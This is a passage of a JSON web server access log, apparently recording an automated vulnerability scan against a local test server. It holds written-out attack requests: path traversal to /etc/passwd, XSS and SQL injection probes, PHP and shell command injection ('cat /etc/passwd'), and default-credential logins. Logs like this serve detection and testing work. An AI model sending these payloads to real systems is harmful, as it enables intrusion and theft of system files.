"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tips/tipsLogin.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/modules/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_run.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redir=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/functions/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"test_data","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"{\x22user\x22:\x22access-admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/artifactory/webapp/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"requester=login&request=login¶ms=[{\x22name\x22:\x22input_id\x22,\x22value\x22:\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\x22},{\x22name\x22:\x22input_passwd\x22,\x22value\x22:\x22PASSWORD\x22},{\x22name\x22:\x22device_id\x22,\x22value\x22:\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\x22},{\x22name\x22:\x22checked\x22,\x22value\x22:false},{\x22name\x22:\x22login_key\x22,\x22value\x22:\x22\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/flip/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"--8ce4b16b22b58894aa86c421e8759df3\x0D\x0AContent-Disposition: form-data; name=\x22jarfile\x22;filename=\x22poc.jar\x22\x0D\x0AContent-Type:application/octet-stream\x0D\x0A\x0D\x0A 29KAnrMkxb2Timk58BjnLO94twx\x0D\x0A--8ce4b16b22b58894aa86c421e8759df3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jars/upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login/?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrE